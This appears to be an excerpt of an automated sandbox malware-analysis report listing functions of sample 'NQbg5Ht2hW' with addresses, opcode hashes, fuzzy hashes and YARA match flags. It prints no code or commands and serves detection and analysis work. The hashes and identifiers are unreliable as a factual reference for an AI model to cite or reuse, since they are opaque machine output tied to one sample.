                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2c308a6fbd29e83612078340da99c3c212b60cd104204cd4e1c6453a1b582895
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2141783A648300DFE3248B94D880ABBBBA3B7D5310F5D552EC5C527222CB745C81878F
                                                                                                                                                                                                                                                                        Function 004236E2 Relevance: 1.4, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: 6B
                                                                                                                                                                                                                                                                        • API String ID: 0-4127139157
                                                                                                                                                                                                                                                                        • Opcode ID: e4ae7821e595edd76aaa032931955796ee87cd6bb1a1de6a8bf0ae27a5d1bb00
                                                                                                                                                                                                                                                                        • Instruction ID: 96ac195b9b02395a12e3507be26d084a31814086cf7b4e33e8fc611c97ddc8d1
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e4ae7821e595edd76aaa032931955796ee87cd6bb1a1de6a8bf0ae27a5d1bb00
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 90416A79A05102CFE708CF68EC917A9B3B2FF8A311F5A45B8D545E7390CB74A951CB48
                                                                                                                                                                                                                                                                        Function 00738DC8 Relevance: 1.4, Strings: 1, Instructions: 142COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: $%
                                                                                                                                                                                                                                                                        • API String ID: 0-4214564638
                                                                                                                                                                                                                                                                        • Opcode ID: 8b76b074fb6ee17701ca33ffcb44bdc905631d8a3bea69b2df4b17f098ff2867
                                                                                                                                                                                                                                                                        • Instruction ID: 3d25c35802596f1a671f00645024d7ca33cd4a4e88a6bb9c447d8406b5381ce7
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8b76b074fb6ee17701ca33ffcb44bdc905631d8a3bea69b2df4b17f098ff2867
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4D4110B0D013198BDB10CF98DC917AEB7B1FF45310F098259E445AB795E7785941CB51
                                                                                                                                                                                                                                                                        Function 00428B61 Relevance: 1.4, Strings: 1, Instructions: 142COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: $%
                                                                                                                                                                                                                                                                        • API String ID: 0-4214564638
                                                                                                                                                                                                                                                                        • Opcode ID: d78bc3d5ce02b10deb2a392cf77ba543051be3d806e39ea4f7dd24e4e80accd5
                                                                                                                                                                                                                                                                        • Instruction ID: 3a12058a654eb28ab9a6ec9325260f0da8ac6e7581b620ea067b04d8af41a39e
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d78bc3d5ce02b10deb2a392cf77ba543051be3d806e39ea4f7dd24e4e80accd5
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 694124B0E022298BCB10CF99E8513AEB7B1FF55310F09825DE441AB790E7785941CB64
                                                                                                                                                                                                                                                                        Function 0074C9CE Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: ,+*)
                                                                                                                                                                                                                                                                        • API String ID: 0-3529585375
                                                                                                                                                                                                                                                                        • Opcode ID: d0860ee87a3522d35f46aac91f37c79de7283bf131867904a39b4a27e1383bdc
                                                                                                                                                                                                                                                                        • Instruction ID: 94fd5e0a12f8f09a4bca0e3888be68c4020d222805db8f35ffd75dd9846a14b5
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d0860ee87a3522d35f46aac91f37c79de7283bf131867904a39b4a27e1383bdc
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5B31B639B412159FEB55CF58CC95BBEB3B2BB49300F289128D541A73D0CB75AD018794
                                                                                                                                                                                                                                                                        Function 0071B973 Relevance: 1.3, Strings: 1, Instructions: 61COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: o`
                                                                                                                                                                                                                                                                        • API String ID: 0-3993896143
                                                                                                                                                                                                                                                                        • Opcode ID: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
                                                                                                                                                                                                                                                                        • Instruction ID: 4ad10b3155aa27b88642308c5da008726487fb32573d1c190adf5e99b11f99dc
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E511E570218380AFC310CF65CDC1B6EBFE29BC2204F65983DE18597291C679E949DB05
                                                                                                                                                                                                                                                                        Function 0041682D Relevance: .8, Instructions: 761COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 0417c610e5770e3de08e3f27a6132ce354b413bedc9eba632381f23ebbae40da
                                                                                                                                                                                                                                                                        • Instruction ID: 1dcbf6391fd41f0c0a817e27e8bafbe762063cd3c7318eef4161125519cd5594
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0417c610e5770e3de08e3f27a6132ce354b413bedc9eba632381f23ebbae40da
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 57424876A083518BD724CF29C8917ABB7E2EFC5310F19892EE4C597351DB38D845CB8A
                                                                                                                                                                                                                                                                        Function 00402F50 Relevance: .7, Instructions: 671COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 42edef53a1db2b3de2c06a60c4f32876a63e42617b2c0b108f141745477d7c97
                                                                                                                                                                                                                                                                        • Instruction ID: 46ead43bd988ad5b99a16a21c2ab1060e4939541d0428d2c05e05470f57672f5
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 42edef53a1db2b3de2c06a60c4f32876a63e42617b2c0b108f141745477d7c97
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2C52E1715083458FCB14CF18C0806AABFE1FF89305F18897EE8996B391D778E949CB89
                                                                                                                                                                                                                                                                        Function 00716977 Relevance: .7, Instructions: 665COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: dbc0620a8ce2ba57e9d910984acef19c89c6c78f1b9d7e948e49654559093e9b
                                                                                                                                                                                                                                                                        • Instruction ID: 9052a562a464200cbbd0daa905c4084fc2c9e23ab64ab7037dfea0417d8b7d87
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dbc0620a8ce2ba57e9d910984acef19c89c6c78f1b9d7e948e49654559093e9b
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4F52E3B0A08B848FEB35DB28C4843E7BBF1BB51314F14892ED5E646AC2D27DA9C5C745
                                                                                                                                                                                                                                                                        Function 00406710 Relevance: .7, Instructions: 665COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 23751e459ccc9bb6a4f1f3a1e8208e8d277617bd75432395b0e424f8c0ad6651
                                                                                                                                                                                                                                                                        • Instruction ID: 42a8754500a030df467a19eb208a6b75f213c456a02a9d9f5179d7aa03d033db
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 23751e459ccc9bb6a4f1f3a1e8208e8d277617bd75432395b0e424f8c0ad6651
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B952E3B0A08B949FE730CB24C4843A7BBE1AB91314F15483FD5D756BC2C27DB9958B0A
                                                                                                                                                                                                                                                                        Function 00717757 Relevance: .6, Instructions: 611COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 83213a2729f592a7edcd98fc7886bfd8d55118cdf426f5e19ae94b324be42bba
                                                                                                                                                                                                                                                                        • Instruction ID: f883ad1b7567bd0b89f3c073f6ae34fb197e1df63dab831c273c18db33e0ce69
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 83213a2729f592a7edcd98fc7886bfd8d55118cdf426f5e19ae94b324be42bba
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F12C232A0C7518BC729DF1CD8806EAB3F1EFC4315F19892DD9C697285D738A895CB86
                                                                                                                                                                                                                                                                        Function 004074F0 Relevance: .6, Instructions: 611COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 83213a2729f592a7edcd98fc7886bfd8d55118cdf426f5e19ae94b324be42bba
                                                                                                                                                                                                                                                                        • Instruction ID: 7b72874d185f9504f09fa30b763c2e13130ca022e31a023e0d3144396e745bed
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 83213a2729f592a7edcd98fc7886bfd8d55118cdf426f5e19ae94b324be42bba
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1012A372A0C7118BD725DE18D8806ABB3E1BFC4315F19893ED986A7385D738B8518B87
                                                                                                                                                                                                                                                                        Function 007216F6 Relevance: .6, Instructions: 607COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: a7ebcab429d69887af0994e9597e2f97a4cbfb516015e6b5ad3962d1502a690c
                                                                                                                                                                                                                                                                        • Instruction ID: e4b2cbad604a756b14430bca06b028522a132788e7863edfeaab57cf5c188f92
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a7ebcab429d69887af0994e9597e2f97a4cbfb516015e6b5ad3962d1502a690c
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6332E6B1A04B408FD714DF38D89576ABBE1BF55310F198A3DD8EB8B381E639A545CB02
                                                                                                                                                                                                                                                                        Function 0041148F Relevance: .6, Instructions: 607COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: c09ab01705470a57d5ac0deba44fab8d122be945ed84d36d91023274058ae07e
                                                                                                                                                                                                                                                                        • Instruction ID: 819cfa75d40707277b7651a3d059055683ccfe715dfab14305db8651ec0ec7a0
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c09ab01705470a57d5ac0deba44fab8d122be945ed84d36d91023274058ae07e
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8C32E6B5A04B408FD714DF38C5953AABBE1AF45310F188A3ED5EB873D2E638A445CB06
                                                                                                                                                                                                                                                                        Function 00713BD7 Relevance: .6, Instructions: 600COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: d327358085ba1a993c9adccc0f3e0ff780f208ec349b024e73061d52e6553d9c
                                                                                                                                                                                                                                                                        • Instruction ID: 76b5a9d25e939ef5b0d3c45e37d67507c6f1ce7c55c4ef016052f8938e066fcd
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d327358085ba1a993c9adccc0f3e0ff780f208ec349b024e73061d52e6553d9c
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 91321170A14B118FC368CF2DC5805AABBF1BF55710B604A2ED6A787E90D73AF985DB10
                                                                                                                                                                                                                                                                        Function 00403970 Relevance: .6, Instructions: 600COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 5aa5d3a12128a26ed9c4319b3588af040b5452ee3ad61b5c13934a671167d9a8
                                                                                                                                                                                                                                                                        • Instruction ID: 1c03f4d1d9da4e588b7eb0090f71902aa376377d07fc1d7850242e2290c7d787
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5aa5d3a12128a26ed9c4319b3588af040b5452ee3ad61b5c13934a671167d9a8
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 02322470914B118FC328CF29C68052ABBF5BF85711B604A2ED697A7F90D73AF945CB18
                                                                                                                                                                                                                                                                        Function 00729A29 Relevance: .6, Instructions: 596COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 7d4a608daa09243b0b1664d6ac314f1ff4fa7c4c8c111b79aec593db6438873e
                                                                                                                                                                                                                                                                        • Instruction ID: 64f33c816c6d8f9b0ca4d5b04be51ef36dd2f85dc4846120c2cbf2466791bcdc
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7d4a608daa09243b0b1664d6ac314f1ff4fa7c4c8c111b79aec593db6438873e
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 20022771A083228BC724CF28C4916ABB7F1EFE5314F19992DE8C99B351E738D945C786
                                                                                                                                                                                                                                                                        Function 004197C2 Relevance: .6, Instructions: 596COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 7d4a608daa09243b0b1664d6ac314f1ff4fa7c4c8c111b79aec593db6438873e
                                                                                                                                                                                                                                                                        • Instruction ID: ba4386b7c12eba82c1b0c1a845e92ae21c1426ac82d7aa641ba094e7d1c8bfda
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7d4a608daa09243b0b1664d6ac314f1ff4fa7c4c8c111b79aec593db6438873e
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FE021671A083128BC724CF28C4A16ABB7F1EFE5350F19852DE8C99B351E7389D85C786
                                                                                                                                                                                                                                                                        Function 00739444 Relevance: .5, Instructions: 549COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: e82c242e154504476aa0c4a283c83f7abe834146c9a10b5b44774a429600f0af
                                                                                                                                                                                                                                                                        • Instruction ID: fb7bc64305ac94c28664f4cccbd6ca98e2752fdd00010a4cba3844897b22f0fb
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e82c242e154504476aa0c4a283c83f7abe834146c9a10b5b44774a429600f0af
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 49F148B1E00325CBDF24CF58C8516AAB7B2FF86310F198159D996AF356E778AC41CB90
                                                                                                                                                                                                                                                                        Function 004291DD Relevance: .5, Instructions: 549COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 2253fead0949c94e28b23ae243de764efe372f7ce01ce19a162629ea64ece33e
                                                                                                                                                                                                                                                                        • Instruction ID: 8cc232c379ab24ad0e8e110b9e0577a2d66b898ca13c535210c4519ca42de900
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2253fead0949c94e28b23ae243de764efe372f7ce01ce19a162629ea64ece33e
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ACF12771E003258BCF24CF58C8516ABB7B2FF95314F198199D896AF355E7389C41CB94
                                                                                                                                                                                                                                                                        Function 00715BF7 Relevance: .4, Instructions: 448COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 76f7eb2ea2dd7941e95dbf1f07b72685953879e74b7f78573d97f49de11c20aa
                                                                                                                                                                                                                                                                        • Instruction ID: 578974f19fc5cbc8fda695b8bc2c0033f2ceab120fcf922316c4e4b6ffb3a62a
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 76f7eb2ea2dd7941e95dbf1f07b72685953879e74b7f78573d97f49de11c20aa
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D1F19E35608741CFD724CF29C881AABBBE6AFD8300F18892DE5D587392E639D945CB52
                                                                                                                                                                                                                                                                        Function 00405990 Relevance: .4, Instructions: 448COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: a69080f6ad1e69bdb89b54cb009ba2c83e518309b21ccd4fa82cf12907931cd9
                                                                                                                                                                                                                                                                        • Instruction ID: bb9b723667839a33c3fd076cb6daf547bf5b8942c047ca41cb9a19f1e1e822b5
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a69080f6ad1e69bdb89b54cb009ba2c83e518309b21ccd4fa82cf12907931cd9
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A3F1CC356087418FD724CF29C88066BFBE2EFD9300F08882EE5D597391E679E944CB96
                                                                                                                                                                                                                                                                        Function 00730BA0 Relevance: .4, Instructions: 438COMMON
